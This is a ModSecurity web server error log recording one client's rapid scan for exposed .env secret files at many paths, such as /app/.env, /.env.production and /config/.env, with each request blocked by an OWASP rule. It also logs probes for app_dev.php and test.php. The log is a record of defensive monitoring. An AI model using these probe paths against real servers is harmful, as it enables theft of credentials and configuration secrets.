[Mon May 11 23:24:58.295035 2026] [security2:error] [pid 1606352:tid 1606430] [client 213.209.159.175:42298] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJKno_DFxNSZVmaX3kHQAAAMs"]
[Mon May 11 23:24:58.342599 2026] [security2:error] [pid 1588898:tid 1588905] [client 213.209.159.175:42302] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/core/.env"] [unique_id "agJJKqFW67LJTsgN3jQgLAAAAAY"]
[Mon May 11 23:24:58.342826 2026] [security2:error] [pid 1588898:tid 1588905] [client 213.209.159.175:42302] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/core/.env"] [unique_id "agJJKqFW67LJTsgN3jQgLAAAAAY"]
[Mon May 11 23:24:58.343876 2026] [security2:error] [pid 1588898:tid 1588905] [client 213.209.159.175:42302] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJKqFW67LJTsgN3jQgLAAAAAY"]
[Mon May 11 23:24:58.389226 2026] [security2:error] [pid 1601130:tid 1601166] [client 213.209.159.175:42318] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/app/.env"] [unique_id "agJJKnEgAO_835W6c1mpdwAAAFA"]
[Mon May 11 23:24:58.389606 2026] [security2:error] [pid 1601130:tid 1601166] [client 213.209.159.175:42318] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/app/.env"] [unique_id "agJJKnEgAO_835W6c1mpdwAAAFA"]
[Mon May 11 23:24:58.390688 2026] [security2:error] [pid 1601130:tid 1601166] [client 213.209.159.175:42318] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJKnEgAO_835W6c1mpdwAAAFA"]
[Mon May 11 23:24:58.461910 2026] [security2:error] [pid 1630927:tid 1630941] [client 213.209.159.175:42326] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /dev/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/dev/.env"] [unique_id "agJJKmiGYYhUwDaJINmgowAAAUs"]
[Mon May 11 23:24:58.462633 2026] [security2:error] [pid 1630927:tid 1630941] [client 213.209.159.175:42326] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/dev/.env"] [unique_id "agJJKmiGYYhUwDaJINmgowAAAUs"]
[Mon May 11 23:24:58.464033 2026] [security2:error] [pid 1630927:tid 1630941] [client 213.209.159.175:42326] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJKmiGYYhUwDaJINmgowAAAUs"]
[Mon May 11 23:24:58.561836 2026] [security2:error] [pid 1606352:tid 1606440] [client 213.209.159.175:42336] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.save"] [unique_id "agJJKno_DFxNSZVmaX3kHgAAANU"]
[Mon May 11 23:24:58.562302 2026] [security2:error] [pid 1606352:tid 1606440] [client 213.209.159.175:42336] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.save"] [unique_id "agJJKno_DFxNSZVmaX3kHgAAANU"]
[Mon May 11 23:24:58.566237 2026] [security2:error] [pid 1606352:tid 1606440] [client 213.209.159.175:42336] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJKno_DFxNSZVmaX3kHgAAANU"]
[Mon May 11 23:24:58.612678 2026] [security2:error] [pid 1588898:tid 1588909] [client 213.209.159.175:42346] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /server/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/server/.env"] [unique_id "agJJKqFW67LJTsgN3jQgLQAAAAo"]
[Mon May 11 23:24:58.612899 2026] [security2:error] [pid 1588898:tid 1588909] [client 213.209.159.175:42346] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/server/.env"] [unique_id "agJJKqFW67LJTsgN3jQgLQAAAAo"]
[Mon May 11 23:24:58.615911 2026] [security2:error] [pid 1588898:tid 1588909] [client 213.209.159.175:42346] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJKqFW67LJTsgN3jQgLQAAAAo"]
[Mon May 11 23:24:58.751062 2026] [security2:error] [pid 1590352:tid 1590397] [client 213.209.159.175:42374] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /staging/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/staging/.env"] [unique_id "agJJKq1q0G_aXAqWauQNHgAAAIU"]
[Mon May 11 23:24:58.751685 2026] [security2:error] [pid 1590352:tid 1590397] [client 213.209.159.175:42374] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/staging/.env"] [unique_id "agJJKq1q0G_aXAqWauQNHgAAAIU"]
[Mon May 11 23:24:58.754824 2026] [security2:error] [pid 1590352:tid 1590397] [client 213.209.159.175:42374] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJKq1q0G_aXAqWauQNHgAAAIU"]
[Mon May 11 23:24:58.799814 2026] [:error] [pid 1605480:tid 1605543] [client 213.209.159.175:42388] File does not exist: /var/www/html/app_dev.php
[Mon May 11 23:24:58.844795 2026] [security2:error] [pid 1588898:tid 1588912] [client 213.209.159.175:42390] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/.env.production"] [unique_id "agJJKqFW67LJTsgN3jQgLgAAAA0"]
[Mon May 11 23:24:58.845021 2026] [security2:error] [pid 1588898:tid 1588912] [client 213.209.159.175:42390] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/.env.production"] [unique_id "agJJKqFW67LJTsgN3jQgLgAAAA0"]
[Mon May 11 23:24:58.846089 2026] [security2:error] [pid 1588898:tid 1588912] [client 213.209.159.175:42390] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJKqFW67LJTsgN3jQgLgAAAA0"]
[Mon May 11 23:24:58.888609 2026] [security2:error] [pid 1601130:tid 1601151] [client 213.209.159.175:42406] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /demo/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/demo/.env"] [unique_id "agJJKnEgAO_835W6c1mpegAAAEE"]
[Mon May 11 23:24:58.888805 2026] [security2:error] [pid 1601130:tid 1601151] [client 213.209.159.175:42406] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/demo/.env"] [unique_id "agJJKnEgAO_835W6c1mpegAAAEE"]
[Mon May 11 23:24:58.889525 2026] [security2:error] [pid 1601130:tid 1601151] [client 213.209.159.175:42406] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJKnEgAO_835W6c1mpegAAAEE"]
[Mon May 11 23:24:58.913020 2026] [security2:error] [pid 1601130:tid 1601151] [client 213.209.159.175:42406] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /portal/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/portal/.env"] [unique_id "agJJKnEgAO_835W6c1mpewAAAEE"]
[Mon May 11 23:24:58.913244 2026] [security2:error] [pid 1601130:tid 1601151] [client 213.209.159.175:42406] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/portal/.env"] [unique_id "agJJKnEgAO_835W6c1mpewAAAEE"]
[Mon May 11 23:24:58.913898 2026] [security2:error] [pid 1601130:tid 1601151] [client 213.209.159.175:42406] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJKnEgAO_835W6c1mpewAAAEE"]
[Mon May 11 23:24:58.995232 2026] [security2:error] [pid 1630927:tid 1630944] [client 213.209.159.175:42408] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/crm/.env"] [unique_id "agJJKmiGYYhUwDaJINmgpgAAAU4"]
[Mon May 11 23:24:58.995662 2026] [security2:error] [pid 1630927:tid 1630944] [client 213.209.159.175:42408] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/crm/.env"] [unique_id "agJJKmiGYYhUwDaJINmgpgAAAU4"]
[Mon May 11 23:24:58.996354 2026] [security2:error] [pid 1630927:tid 1630944] [client 213.209.159.175:42408] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJKmiGYYhUwDaJINmgpgAAAU4"]
[Mon May 11 23:24:59.045178 2026] [security2:error] [pid 1590352:tid 1590416] [client 213.209.159.175:42424] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /test/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/test/.env"] [unique_id "agJJK61q0G_aXAqWauQNHwAAAJg"]
[Mon May 11 23:24:59.045428 2026] [security2:error] [pid 1590352:tid 1590416] [client 213.209.159.175:42424] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/test/.env"] [unique_id "agJJK61q0G_aXAqWauQNHwAAAJg"]
[Mon May 11 23:24:59.053909 2026] [security2:error] [pid 1590352:tid 1590416] [client 213.209.159.175:42424] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJK61q0G_aXAqWauQNHwAAAJg"]
[Mon May 11 23:24:59.102884 2026] [security2:error] [pid 1605480:tid 1605542] [client 213.209.159.175:42440] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /config/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/config/.env"] [unique_id "agJJKx2Cvzd_nyNfUm8S-gAAARQ"]
[Mon May 11 23:24:59.103520 2026] [security2:error] [pid 1605480:tid 1605542] [client 213.209.159.175:42440] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/config/.env"] [unique_id "agJJKx2Cvzd_nyNfUm8S-gAAARQ"]
[Mon May 11 23:24:59.109925 2026] [security2:error] [pid 1605480:tid 1605542] [client 213.209.159.175:42440] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJKx2Cvzd_nyNfUm8S-gAAARQ"]
[Mon May 11 23:24:59.148500 2026] [security2:error] [pid 1588898:tid 1588907] [client 213.209.159.175:42454] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bot/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "217.113.192.26"] [uri "/bot/.env"] [unique_id "agJJK6FW67LJTsgN3jQgLwAAAAg"]
[Mon May 11 23:24:59.148941 2026] [security2:error] [pid 1588898:tid 1588907] [client 213.209.159.175:42454] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "217.113.192.26"] [uri "/bot/.env"] [unique_id "agJJK6FW67LJTsgN3jQgLwAAAAg"]
[Mon May 11 23:24:59.150272 2026] [security2:error] [pid 1588898:tid 1588907] [client 213.209.159.175:42454] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "217.113.192.26"] [uri "/403.shtml"] [unique_id "agJJK6FW67LJTsgN3jQgLwAAAAg"]
[Mon May 11 23:24:59.192995 2026] [:error] [pid 1601130:tid 1601158] [client 213.209.159.175:42460] File does not exist: /var/www/html/test.php
